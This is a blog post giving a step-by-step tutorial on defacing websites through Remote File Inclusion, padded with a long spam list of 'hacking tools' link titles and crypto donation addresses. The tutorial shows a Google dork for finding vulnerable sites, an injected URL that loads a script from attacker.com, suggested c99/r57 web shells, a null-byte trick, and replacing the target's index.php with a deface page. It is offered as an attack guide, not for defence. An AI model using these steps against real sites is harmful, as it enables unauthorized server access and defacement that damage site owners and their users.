Donations

BTC: bc1qxv3stg0xha9upurf7h4aqnmg3xjn3h0zk28kpe

ETH: 0x01870296774Fb0A2DbF9b44d2E6a57fb8Ccea070

LTC: LQ44CP6xDDkX5bAiKd3yqmDB4c23U7orrQ

DOGE: DCpu9v1bkTXj8VKUDG97LHdV2qipDPyZsR

ADA: addr1qx4q7348dv2ju5zshee9ru23ssmqhyyjlnxe0xlezjq5we42par2w6c49eg9p0nj28c4rppkpwgf9lxdj7dlj9ypganqtmuu2p

domingo, 30 de agosto de 2020

HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

Posted by Carlos Morato on 03:54
0

HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

Remote File Inclusion (RFI) is a technique that allows the attacker to upload a malicious code or file on a website or server. The vulnerability exploits the different sort of validation checks in a website and can lead to code execution on server or code execution on the website. This time, I will be writing a simple tutorial on Remote File Inclusion and by the end of the tutorial, I suppose you will know what it is all about and may be able to deploy an attack.
RFI is a common vulnerability. All the website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and play almost anything with the server. Why it put a red alert to the websites, just because of that you only need to have your common sense and basic knowledge of PHP to execute malicious code. BASH might come handy as most of the servers today are hosted on Linux.

SO, HOW TO HACK A WEBSITE OR SERVER WITH RFI?

First of all, we need to find out an RFI vulnerable website. Let's see how we can find one.
As we know finding a vulnerability is the first step to hack a website or server. So, let's get started and simply go to Google and search for the following query.
inurl: "index.php?page=home"
At the place of home, you can also try some other pages like products, gallery and etc.
If you already a know RFI vulnerable website, then you don't need to find it through Google.
Once we have found it, let's move on to the next step. Let's see we have a following RFI vulnerable website.
http://target.com/index.php?page=home
As you can see, this website pulls documents stored in text format from the server and renders them as web pages. Now we can use PHP include function to pull them out. Let's see how it works.
http://target.com/index.php?page=http://attacker.com/maliciousScript.txt
I have included my malicious code txt URL at the place of home. You can use any shell for malicious scripts like c99, r57 or any other.
Now, if it's a really vulnerable website, then there would be 3 things that can happen.
  1. You might have noticed that the URL consisted of "page=home" had no extension, but I have included an extension in my URL, hence the site may give an error like 'failure to include maliciousScript.txt', this might happen as the site may be automatically adding the .txt extension to the pages stored in server.
  2. In case, it automatically appends something in the lines of .php then we have to use a null byte '' in order to avoid error.
  3. Successful execution.
As we get the successful execution of the code, we're good to go with the shell. Now we'll browse the shell for index.php. And will replace the file with our deface page.

More articles


  1. Hacker Tools Free
  2. Hack Tools For Pc
  3. Pentest Tools Framework
  4. Hack Tool Apk
  5. Install Pentest Tools Ubuntu
  6. Hacker Tools 2020
  7. Hack Tools Github
  8. Hack Apps
  9. Nsa Hacker Tools
  10. Hacker
  11. Hacking Tools Kit
  12. Pentest Tools Linux
  13. New Hack Tools
  14. Pentest Tools Windows
  15. Hack Website Online Tool
  16. Github Hacking Tools
  17. Blackhat Hacker Tools
  18. New Hack Tools
  19. Hack Apps
  20. Hacking App
  21. Pentest Tools Download
  22. Hacker Tools List
  23. Pentest Tools Website
  24. Hacking Tools Pc
  25. Hacker Tools Mac
  26. Hacker Search Tools
  27. Pentest Tools Alternative
  28. Hacker Tools Apk
  29. What Are Hacking Tools
  30. Hackers Toolbox
  31. Beginner Hacker Tools
  32. Hacker Tools Mac
  33. Pentest Recon Tools
  34. Hacking Tools For Windows 7
  35. Hacker Tools Hardware
  36. Hacking Tools Windows 10
  37. Termux Hacking Tools 2019
  38. Wifi Hacker Tools For Windows
  39. World No 1 Hacker Software
  40. Hacking Tools Windows 10
  41. Hacker Hardware Tools
  42. Hack Tools Online
  43. Hacking Tools Usb
  44. Hackrf Tools
  45. Hacker Tools Hardware
  46. Hacking Tools For Windows Free Download
  47. Hacking Tools For Kali Linux
  48. Hacker Tools 2019
  49. Pentest Tools Website Vulnerability
  50. Hacking Tools 2019
  51. Hack Website Online Tool
  52. Hacking Tools Online
  53. Top Pentest Tools
  54. Hacker Tools 2020
  55. Game Hacking
  56. Bluetooth Hacking Tools Kali
  57. Hacking Tools For Games
  58. Pentest Automation Tools
  59. Pentest Tools Alternative
  60. Pentest Recon Tools
  61. What Are Hacking Tools
  62. Pentest Tools Find Subdomains
  63. Android Hack Tools Github
  64. Hacker Tool Kit
  65. Hacking Tools Usb
  66. Pentest Tools
  67. Pentest Tools Free
  68. Pentest Tools Android
  69. Hacker Tools For Mac
  70. Hacker Tools Github
  71. Nsa Hack Tools
  72. Hacking Tools For Games
  73. Pentest Tools For Mac
  74. Pentest Automation Tools
  75. Hacking Tools Software
  76. Computer Hacker
  77. Nsa Hack Tools

0 comentários:

Postar um comentário

Assinar: Postar comentários (Atom)

Donations

BTC: bc1qxv3stg0xha9upurf7h4aqnmg3xjn3h0zk28kpe

ETH: 0x01870296774Fb0A2DbF9b44d2E6a57fb8Ccea070

LTC: LQ44CP6xDDkX5bAiKd3yqmDB4c23U7orrQ

DOGE: DCpu9v1bkTXj8VKUDG97LHdV2qipDPyZsR

ADA: addr1qx4q7348dv2ju5zshee9ru23ssmqhyyjlnxe0xlezjq5we42par2w6c49eg9p0nj28c4rppkpwgf9lxdj7dlj9ypganqtmuu2p

Archives

Tecnologia do Blogger.